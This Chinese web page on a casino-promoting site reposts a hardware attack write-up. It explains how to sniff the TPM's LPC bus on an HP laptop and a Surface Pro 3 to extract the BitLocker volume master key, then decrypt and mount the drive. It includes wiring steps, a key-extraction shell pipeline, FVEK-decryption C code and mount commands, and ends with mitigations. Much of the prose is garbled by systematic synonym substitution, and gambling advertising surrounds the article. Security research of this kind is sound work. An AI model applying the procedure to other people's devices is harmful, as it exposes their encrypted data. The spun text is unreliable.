怎样从TPM中提取BitLocker私钥 | 申博官网
登录
  • 欢迎进入申博官网!
  • 如果您觉得申博官网对你有帮助,那么赶紧使用Ctrl+D 收藏申博官网并分享出去吧
  • 这里是申博官方网!
  • 申博官网是菲律宾sunbet官网品牌平台!
  • 申博开户专业品牌平台!

怎样从TPM中提取BitLocker私钥

申博_安全防护 申博 219次浏览 已收录 0个评论

腾讯安全科恩实验室:2018年IoT安全白皮书

BitLocker的运转道理

BitLocker驱动器加密它是在Windows Vista中新增的一种数据珍爱功用,主要用于处置惩罚一个人们愈来愈体贴的题目:由盘算机装备的物理丧失致使的数据失贼或歹意走漏。在新一代操纵体系Windows 8.1中也能运用此加密驱动。伴同Windows Server 2008一同宣布的有BitLocker实用顺序,该顺序能够或许经由历程加密逻辑驱动器来珍爱主要数据,还供应了体系启动完全性搜检功用。

BitLocker运用TPM资助珍爱Windows操纵体系和用户数据,并资助确保盘算机纵然在无人介入、丧失或被盗的情况下也不会被改动。

受信托的平台模块(Trusted Platform Module,TPM)是一个内置在盘算机中的微芯片。它用于存储加密信息,如加密密钥。存储在TPM上的信息会更平安,制止遭到外部软件进击和物理偷窃。BitLocker可加密存储于Windows操纵体系卷上的一切数据,默许情况下,运用TPM以确保初期启动组件的完全性(组件用于启动历程的更早时代),和“锁定”任何BitLocker珍爱卷,使之在即使盘算机遭到改动也取得珍爱。

然则BitLocker有一项缺少,翻开加密盘后,再次进入就不须要暗码了,那末怎样能力使每次接见加密盘都要暗码呢?这恐怕是微软后续革新的题目了,然则如今,我们能够在最先任务栏里输入“cmd”,然后以管理员身份运转,输入 manage-bde(空格)-lock(空格)X:,x为加密磁盘盘符。如许就能够或许再次锁住加密盘了。

Windows BitLocker驱动器加密经由历程加密Windows操纵体系卷上存储的一切数据能够更好地珍爱盘算机中的数据。若是盘算机装置了兼容TPM,BitLocker将运用TPM锁定珍爱数据的加密密钥。因而,在TPM已考证盘算机的状况以后,能力接见这些密钥。加密全部卷能够珍爱一切数据,包孕操纵体系本身、Windows注册表、临时文件和休眠文件。因为解密数据所需的密钥连结由TPM锁定,因而进击者没法经由历程只是掏出硬盘并将其装置在另一台盘算机上来读取数据。

在启动历程当中,TPM将开释密钥,该密钥仅在将主要操纵体系设置装备摆设值的一个哈希值与一个先前所拍摄的快照举行对照以后解锁加密分区。这将考证Windows启动历程的完全性。若是TPM检测到Windows装置已被改动,则不会开释密钥

默许情况下,BitLocker装置领导设置装备摆设为与TPM无缝运用。管理员能够运用组策略或剧本启用其他功用和选项。为了加强平安性,能够将TPM与用户输入的PIN或存储在USB闪存驱动器上的启动密钥组合运用。在不带有兼容TPM的盘算机上,BitLocker能够供应加密,而不供应运用TPM锁定密钥的其他平安。在这类情况下,用户须要竖立一个存储在USB闪存驱动器上的启动密钥

TPM的运转道理

TPM是一个微芯片,设想用于供应基础平安性相干功用,主要触及加密密钥。TPM一般装置在台式盘算机或许便携式盘算机的主板上,经由历程硬件总线与体系其余局部通讯。

兼并了TPM的盘算机能够或许竖立加密密钥并对其举行加密,以便只能够由TPM解密。此历程一般称作“掩盖”或“绑定”密钥,能够资助制止泄漏密钥。每一个TPM有一个主掩盖密钥,称为“存储根密钥(SRK)”,它存储在TPM的内部。在TPM中竖立的密钥的隐私局部从不袒露给其他组件、软件、历程或许职员。

兼并了TPM的盘算机还能够竖立一个密钥,该密钥不只被掩盖,而且还被衔接到特定硬件或软件前提。这称为“密封”密钥。初次竖立密封密钥时,TPM将纪录设置装备摆设值和文件哈希的快照。仅在这些以后体系值与快照中的值相匹配时才“解封”或开释密封密钥。BitLocker运用密封密钥检测对Windows操纵体系完全性的进击。

运用TPM,密钥对的隐私局部在操纵体系控制的内存以外零丁生存。因为TPM运用本身的内部固件和逻辑电路来处置惩罚指令,以是它不依赖于操纵体系,也不会受外部软件破绽的影响。

怎样从TPM中提取BitLocker私钥

默许情况下,能够经由历程嗅探LPC总线,在TPM返回时检索卷的主密钥(Volume Master Key,VMK),并运用检索到的VMK解密受珍爱的驱动器来接见Microsoft BitLocker珍爱的操纵体系驱动器。本文将引见怎样经由历程运用逻辑分析仪或低价的FPGA开发板嗅探LPC总线,从TPM芯片中提取明文密钥。FPGA(Field-ProgrammableGateArray),即现场可编程门阵列,它是在PAL、GAL、CPLD等可编程器件的基础上进一步生长的产品。它是作为专用集成电路(ASIC)领域中的一种半定制电路而涌现的,既处置惩罚了定制电路的缺少,又克服了原有可编程器件门电路数有限的瑕玷。LPC总线,原名叫Low pin count Bus,是在IBM PC兼容机中用于把低带宽装备和“老旧”衔接到CPU上。那些罕见低速装备有:BIOS,串口,并口,PS/2的键盘和鼠标,软盘控制器,对照新的装备有TPM。

本文演示了对运用TPM1.2芯片的惠普笔记本电脑逻辑板和运用TPM2.0芯片的Surface Pro 3的进击,要领就是从总线衔接到卷解密,包孕源代码。

破解大神Hector Martin(@marcan)提到他能够或许直接从LPC总线上嗅探到BitLocker VMK时,我事先就有从 TPM 中提取 BitLocker 私钥的设法主意。 Hector运用FPGA来嗅探TPM1.2芯片的总线,然则我想看看我是不是能用廉价的逻辑分析仪完成一样的功用并实验进击TPM2.0芯片。

注重:你能够运用异常廉价的FPGA (~$40NZD)和如今公然可用的代码,或许运用异常高等的逻辑分析仪,从TPM1.2或TPM2.0装备中嗅探默许设置装备摆设中的BitLocker密钥。嗅探后,你能够解密驱动器。若是解密不胜利,你就要启用其他预启动身份考证。

怎样从TPM中提取BitLocker私钥的思绪

Windows运用BitLocker加密驱动器。运用全卷加密密钥(FVEK)对数据举行加密。然后运用卷主密钥(VMK)对FVEK举行加密。 VMK由多个珍爱器加密,比方,在默许设置装备摆设中有两个珍爱器。一个是TPM,另一个是规复密钥。若是进击者能够物理接见装备,则没法将笔记本电脑启动到Linux及时发行版(或删除驱动器)来接见你的数据。

在其默许设置装备摆设中启用BitLocker时,启动时不须要其他用户交互。这是因为TPM仅用于解密VMK。这背地的设法主意是,若是笔记本电脑被盗,而且进击者不知道你的登录暗码,他们就没法掏出驱动器并读取内容。对bios或启动加载顺序代码的任何修正都应变动PCR值,而且TPM不会解密VMK。

当解密自动发作时,若是我们能够在TPM返回VMK时嗅探VMK,那末我们能够将该信息输入恣意数目标BitLocker库并解密驱动器。

要强调的是,本文所讲的案例中,TPM不会解密密钥,除非它处于预期的启动状况(PCR寄存器中有一组特定的值)。这就是为何你不能在TPM上启动Ubuntu live镜像,只是在TPM上挟制一个解密敕令。

TPM挂在LPC、SPI或I2C总线上,以检察特定芯片的数据表。不外,本文只存眷LPC总线。我在本文末端的附注供应了TPM客户端范例的链接。关于SPI或I2C进击,我将从逻辑分析仪最先。

起首我要从TPM1.2装备中提取BitLocker私钥,其目标是反复一遍从LPC总线上嗅探到BitLocker VMK的历程。稍后,我还会解说怎样从TPM2.0装备中提取BitLocker私钥。

布线

我测试的主板上有一块Infineon SLB96350芯片,经由历程LPC衔接。下图显现了电路板上的芯片和数据表中的引脚(pin-out):

怎样从TPM中提取BitLocker私钥

为了嗅探LPC总线,我们统共须要衔接7根电线,它们分别是Clock, LFRAME, LAD0, LAD1, LAD2, LAD3和ground。因为我没有充足的逻辑探针来夹住0.65mm间距的引脚,以是我不得不将飞线(Jump wire)直接焊接到TPM芯片上。我注重到在TPM芯片左边有一个未添补的头(上面的紫色框),因而我决议用万用表的一连形式戳这个头,以防它衔接到LPC总线的调试头。经由考证,这确切是一个带有LPC总线衔接的标头。我决议将飞线焊接到这些焊盘上,而不是直接焊接到TPM上。来由很简单,因为头部运用更大的间距,更轻易焊接。若是电路板上的有些处所没有LPC调试头,那末你要警惕处置惩罚并直接焊接到TPM(稍后将细致引见),或许挑选一些能够处置惩罚TSSOP28包的探针。

此时,我已与总线举行了物理衔接,因而下一步是衔接一些能够读取LPC音讯的器械。

用逻辑分析仪提取

我挑选的是DSLogic Plus 16通道逻辑分析仪并将其衔接起来,鉴于LPC总线时钟运转速率为33MHZ,我决议以100MHZ采样,DSLogic能够很顺遂地在多个通道上举行采样。启动笔记本电脑并运转逻辑分析仪后,我看到能够运用DSView的LPC解码器解码的有用LPC数据。因为DSView运用libsigrokdecode(一个接纳C言语编写的同享库),因而在Pulseview中应该是雷同的。

怎样从TPM中提取BitLocker私钥

如今,我必需处置惩罚两个题目。第一个是解码器将TPM音讯申报生存起来,而且没有准确解码它们;第二个是逻辑分析器没有充足的存储空间来捕捉完全的启动历程,以是我只看到了在启动时发作的事变的快照。 DSLogic的运转长度编码意味着只需我没有捕捉时钟旌旗灯号,我就能够或许很好地捕捉全部启动历程。然则若是没有时钟旌旗灯号,解码器将没法事情,我必需手动解码一切内容。鉴于LPC音讯量太大,手动解码是不能够被运用的。

修正LPC解码器

TPM LPC实行运用特定的START字段(0101),因而须要修正解码器来明白这一字段。详细的修复细节,请点击我竖立的DSView存储库的pull要求。

处置惩罚缺少时钟的题目

处置惩罚方案就是运用更好的逻辑分析仪,因而,运用单个通道,我能够在流形式下捕捉100MHZ(这意味着我能够猎取整整十秒的时钟)。我的设计是在启动历程当中运用10秒的时候来捕捉我须要的5个旌旗灯号,然后捕捉10秒的时钟,然后将这两个旌旗灯号夹杂在一同并删除。不外另有别的一种设施,就是运用具有充足采样深度的逻辑分析仪(6个通道@ 100MHZ,延续10秒)。将这些结合起来就是解压缩捕捉的文件、增加新数据和修正头文件以增加分外的探测。终究的效果就是,大批的LPC音讯不断涌现。

检索VMK

————————————-

申博网络安全巴士站

申博-网络安全巴士站是一个专注于网络安全、系统安全、互联网安全、信息安全,全新视界的互联网安全新媒体。

————————————-

既然LPC音讯已被解码,剩下的就是在转储数据中找到VMK。如今我决议搜刮VMK标头的开首:0x2c 0x00 0x00 0x00。若是确定标头在个中,我会手动阅读DSView中的音讯,并确保解码器没有脱漏任何内容。若是标头不存在,我将实验别的一个分歧的时钟样本,然后再试一次。光荣的是,第一次实验就胜利了。标头数据字节位于地点0x00000024上的TTPM read敕令中,因而我接下来就是主要存眷该地点的音讯。

在DSView中举行捕捉时,我把一切的字节都纪录了下来,胜利解码的音讯以下所示。

怎样从TPM中提取BitLocker私钥

每次碰到音讯时,我都确保内存读取地点为0x0024,然后解码数据字节。 LPC数据字段是由小字节序组成的,以最低有用位开首。详细解码历程以下所示:

怎样从TPM中提取BitLocker私钥

怎样从TPM中提取BitLocker私钥

在完成捕捉后,我终究取得了完全的VMK(用粉色高亮显现)。

怎样从TPM中提取BitLocker私钥

注重:你确切能够运用逻辑分析器提取BitLocker密钥。不外比肯定非得运用我引见的对象,你能够运用一个采样深度更大且让你信托的逻辑分析仪。

TPM2.0

TPM2.0装备支撑敕令和相应参数加密,能够防备嗅探进击。 然则Windows没有举行此设置装备摆设,因而TPM1.2装备上的提取要领一样适用于TPM2.0。

继承运用FPGA,针对Surface Pro 3实行了以下进击。

LPC

我运用https://github.com/lynxis/lpc_sniffer举行了一些变动,ICEStick(一款易于运用、带有USB接口、拇指巨细的开发板)将读取LPC音讯并经由历程UART发还数据。为此,我须要在ICEStick的FTDI芯片的第二个接口上启用Fast-opto形式。

因为我调整了代码库来查找TPM特定的肇端字段,以是我碰到了轮回缓冲区(Ring Buffer)溢出的题目。原因是LPC音讯太多,因而我修正了代码库仅纪录地点为0x00000024的音讯。这好像处置惩罚了溢出题目,得以让我在启动时期捕捉一切0x00000024寻址数据。若是你正在运用具有此代码库的ICEStick,请密切注重溢出题目。若是轮回缓冲区最先溢出,那末你将取得不完全的数据。

嗅探器代码可在此处猎取:https://github.com/denandz/lpc_sniffer_tpm

布线

衔接Surface Pro 3多是全部项目中最死板和庞杂的局部,发起你肯定要连结耐烦。拆下逻辑板后,TPM芯片位于底部,即英飞凌SLB9665TT2.0:

怎样从TPM中提取BitLocker私钥

我会将一些飞线直接焊接到TPM芯片上,虽然在这个板上有一堆林林总总的未添补头,然则它们都很邃密,以是我实验将它们直接衔接在芯片上。然后从新组装外面,并将飞线引出壳体外。接着,我会将飞线焊接到GND, LCLK, LFRAME#, LRESET#和LAD[0:3]引脚,然后将两头镀上锡并举行符号。

怎样从TPM中提取BitLocker私钥

怎样从TPM中提取BitLocker私钥

依据LPC嗅探器申报中的Readme.MD文件引见,这些引线将衔接到Lattice ICEStick。

怎样从TPM中提取BitLocker私钥

私钥提取

在衔接并革新FPGA以后,我会运用以下敕令检索VMK,然后翻开Surface:

sudo python3 parse/read_serial.py /dev/ttyUSB1  | tee log1

怎样从TPM中提取BitLocker私钥

从FPGA返回的数据结构为 b'[32 bit address][8 bit data][read (00) or write (02)]’。

以下就是用于检索VMK的代码::

[email protected]:~/tools/lpc_sniffer_tpm$ cut -f 2 -d\' log1 | grep '24..00$'  \
> | perl -pe 's/.{8}(..)..\n/$1/' | grep -Po "2c0000000100000003200000(..){32}"
2c00000001000000032000009a126146b5b285c93f7c4bcd372f91d0181fe7eddc44e588459ebdb244d97baa

在本文的案例中,VMK是

9a126146b5b285c93f7c4bcd372f91d0181fe7eddc44e588459ebdb244d97baa

私钥解密

经由历程运用Dislocker代码库解密FVEK,然后装置驱动器来完成驱动器解密。关于Surface Pro 3,起首衔接驱动器:

怎样从TPM中提取BitLocker私钥

[email protected]:~/src/dislocker-0.7.1/src$ sudo dd status=progress if=/dev/sda of=surface_pro.img bs=8M
127934660608 bytes (128 GB, 119 GiB) copied, 474 s, 270 MB/s
15263+1 records in
15263+1 records out
128035676160 bytes (128 GB, 119 GiB) copied, 475.489 s, 269 MB/s

运用dislocker-metadata敕令检索加密的FVEK,MAC和nonce:

[email protected]:~/src/dislocker-0.7.1/src$ ./dislocker-metadata -vvvv -V ./surface_pro.img -o $((1492992*512))  
Mon Feb 18 22:08:44 2019 [DEBUG] Verbosity level to DEBUG (4) into 'stdout'
Mon Feb 18 22:08:44 2019 [INFO] dislocker by Romain Coltel, v0.7.1 (compiled for Linux/x86_64)
Mon Feb 18 22:08:44 2019 [INFO] Compiled version: :
Mon Feb 18 22:08:44 2019 [DEBUG] Trying to open './surface_pro.img'...
Mon Feb 18 22:08:44 2019 [DEBUG] Trying to open './surface_pro.img'...
Mon Feb 18 22:08:44 2019 [DEBUG] Opened (fd #3).
{...snip...}
Mon Feb 18 22:08:44 2019 [DEBUG] Total datum size: 0x0050 (80) bytes
Mon Feb 18 22:08:44 2019 [DEBUG] Datum entry type: 3
Mon Feb 18 22:08:44 2019 [DEBUG]    `--> ENTRY TYPE FVEK (FveDatasetVmkGetFvek)
Mon Feb 18 22:08:44 2019 [DEBUG] Datum value type: 5
Mon Feb 18 22:08:44 2019 [DEBUG]    `--> AES-CCM -- Total size header: 36 -- Nested datum: no
Mon Feb 18 22:08:44 2019 [DEBUG] Status: 0x1
Mon Feb 18 22:08:44 2019 [DEBUG] Nonce: 
Mon Feb 18 22:08:44 2019 [DEBUG] b0 b2 fb 7c b4 c6 d4 01 0f 00 00 00 
Mon Feb 18 22:08:44 2019 [DEBUG] MAC: 
Mon Feb 18 22:08:44 2019 [DEBUG] dc 5f 42 12 9a 4c 5f d5 12 97 e3 15 9b 83 10 56 
Mon Feb 18 22:08:44 2019 [DEBUG] Payload:
Mon Feb 18 22:08:44 2019 [DEBUG] 0x00000000 fb d6 5f 50 e3 82 92 60-71 16 5c 7a 4b d3 a9 92 
Mon Feb 18 22:08:44 2019 [DEBUG] 0x00000010 a3 94 ff 09 ed bc 6b fb-16 cc 2e 08 ee 25 57 95 
Mon Feb 18 22:08:44 2019 [DEBUG] 0x00000020 e9 7b 83 8b 8d 6f cd 0e-06 e9 5c 54 
{...snip...}

然后,将上面的值与VMK一同传递给解密函数,以检索FVEK。

// In the dislocker main directory, run make then compile with: 
//      /usr/bin/cc -I./include -fPIC -Wall -Wextra -fstack-protector -o fvek-decrypt fvek-decrypt.c \
//          src/libdislocker.so.0.7.1 -lpthread /usr/lib/x86_64-linux-gnu/libmbedcrypto.so

#include "dislocker/common.h"
#include "dislocker/encryption/decrypt.h"

int main ()
{
    dis_stdio_init(L_DEBUG, NULL);

    unsigned char encrypted_fvek[] = {
        0xfb, 0xd6, 0x5f, 0x50, 0xe3, 0x82, 0x92, 0x60, 0x71, 0x16, 0x5c, 0x7a,
        0x4b, 0xd3, 0xa9, 0x92, 0xa3, 0x94, 0xff, 0x09, 0xed, 0xbc, 0x6b, 0xfb,
        0x16, 0xcc, 0x2e, 0x08, 0xee, 0x25, 0x57, 0x95, 0xe9, 0x7b, 0x83, 0x8b,
        0x8d, 0x6f, 0xcd, 0x0e, 0x06, 0xe9, 0x5c, 0x54
    };

    unsigned char mac[] = { 0xdc, 0x5f, 0x42, 0x12, 0x9a, 0x4c, 0x5f, 0xd5, 0x12, 0x97, 0xe3, 0x15, 0x9b, 0x83, 0x10, 0x56 };

    unsigned char nonce[] = { 0xb0, 0xb2, 0xfb, 0x7c, 0xb4, 0xc6, 0xd4, 0x01, 0x0f, 0x00, 0x00, 0x00 };

    unsigned char vmk[] = {
        0x9a, 0x12, 0x61, 0x46, 0xb5, 0xb2, 0x85, 0xc9, 0x3f, 0x7c, 0x4b, 0xcd,
        0x37, 0x2f, 0x91, 0xd0, 0x18, 0x1f, 0xe7, 0xed, 0xdc, 0x44, 0xe5, 0x88,
        0x45, 0x9e, 0xbd, 0xb2, 0x44, 0xd9, 0x7b, 0xaa
    };

    void * output;

    decrypt_key( encrypted_fvek, sizeof(encrypted_fvek), mac, nonce, vmk, sizeof(vmk) * 8, &output);
    hexdump(L_DEBUG, output, 0x2c);
[email protected]:~/src/dislocker-0.7.1$ ./fvek-decrypt 
{...snip...}
Mon Feb 18 22:35:37 2019 [DEBUG] Ending aes_ccm_compute_unencrypted_tag successfully!
Mon Feb 18 22:35:37 2019 [DEBUG] Looking if MACs match...
Mon Feb 18 22:35:37 2019 [DEBUG] They are just below:
Mon Feb 18 22:35:37 2019 [DEBUG] 0x00000000 86 bb 9b 2d 98 84 85 40-3a ce ed 70 6e b4 a8 3f 
Mon Feb 18 22:35:37 2019 [DEBUG] 0x00000000 86 bb 9b 2d 98 84 85 40-3a ce ed 70 6e b4 a8 3f 
Mon Feb 18 22:35:37 2019 [DEBUG] Ok, they match!
Mon Feb 18 22:35:37 2019 [DEBUG] 0x00000000 2c 00 00 00 01 00 00 00-04 80 00 00 c9 4e 3e 9a 
Mon Feb 18 22:35:37 2019 [DEBUG] 0x00000010 18 e7 50 38 d5 c1 74 04-7f 50 3e 86 5b de 78 83 
Mon Feb 18 22:35:37 2019 [DEBUG] 0x00000020 45 6b c4 ef 9b c1 00 d2-45 97 14 1b

检索FVEK后,我们能够将该信息传递给bdemount并猎取对明文信息的接见权限:

[email protected]:~/src/dislocker-0.7.1/src$ sudo bdemount -k c94e3e9a18e75038d5c174047f503e865bde7883456bc4ef9bc100d24597141b -o $((1492992*512)) surface_pro.img /mnt/bitlocker
bdemount 20170902

[email protected]:~/src/dislocker-0.7.1/src$ sudo mkdir /mnt/ntfs
[email protected]:~/src/dislocker-0.7.1/src$ sudo mount -oro /mnt/bitlocker/bde1 /mnt/ntfs
[email protected]:~/src/dislocker-0.7.1/src$ cd /mnt/ntfs/
[email protected]:/mnt/ntfs$ ls -l
total 5555352
drwxrwxrwx 1 root root       4096 Feb 17 22:07  Config.Msi
-rwxrwxrwx 1 root root 4195418112 Feb 18 14:25  hiberfil.sys
drwxrwxrwx 1 root root          0 Feb 13 02:09  Intel
-rwxrwxrwx 1 root root 1476395008 Feb 18 01:00  pagefile.sys
drwxrwxrwx 1 root root          0 Feb 13 00:59  PerfLogs
drwxrwxrwx 1 root root       4096 Feb 13 07:35  ProgramData
drwxrwxrwx 1 root root       4096 Feb 13 07:35 'Program Files'
drwxrwxrwx 1 root root       4096 Feb 13 07:35 'Program Files (x86)'
drwxrwxrwx 1 root root          0 Feb 13 01:06  Recovery
drwxrwxrwx 1 root root          0 Feb 13 04:05 '$Recycle.Bin'
-rwxrwxrwx 1 root root   16777216 Feb 18 01:00  swapfile.sys
drwxrwxrwx 1 root root       4096 Feb 13 01:06 '$SysReset'
drwxrwxrwx 1 root root      40960 Feb 13 08:44 'System Volume Information'
drwxrwxrwx 1 root root       4096 Feb 13 02:39  Users

怎样减缓从TPM中提取BitLocker私钥

运用TPM+PIN珍爱顺序然后启用BitLocker能够减缓此破绽,然则用户须要在启动时输入PIN。除运用TPM以外,用作分外预启动身份考证的智能卡或USB密钥也能够减缓此题目。点击这里,能够检察微软给出的官方珍爱对策。

因为体系启动时不须要用户供应任何密钥资料,因而有很多要领能够实验检索BitLocker密钥。好比关于DMA进击,很多PC能够易遭到针对UEFI的预指导直接内存接见(DMA)进击,对此,我想知道官方的步伐中是不是有相干的珍爱步伐存在?纵然启用了要乞降相应参数加密,依然能够存在从TPM检索密钥的要领。

在我将我的设法主意通知给MSRC后,他们发起若是我忧郁这类进击,能够启用分外的预启动身份考证。

Apache HTTP Server组件提权漏洞预警

近日,Aapche HTTP Server官方发布了Aapche HTTP Server 2.4.39版本的更新,该版本修复了一个漏洞编号为CVE-2019-0211提权漏洞,漏洞等级高危,根据深信服安全团队分析,该漏洞影响严重,攻击者可以通过上传攻击脚本在目标服务器上进行提


申博|网络安全巴士站声明:该文看法仅代表作者自己,与本平台无关。版权所有丨如未注明 , 均为原创丨本网站采用BY-NC-SA协议进行授权
转载请注明怎样从TPM中提取BitLocker私钥
喜欢 (0)
[]
分享 (0)
发表我的评论
取消评论
表情 贴图 加粗 删除线 居中 斜体 签到

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址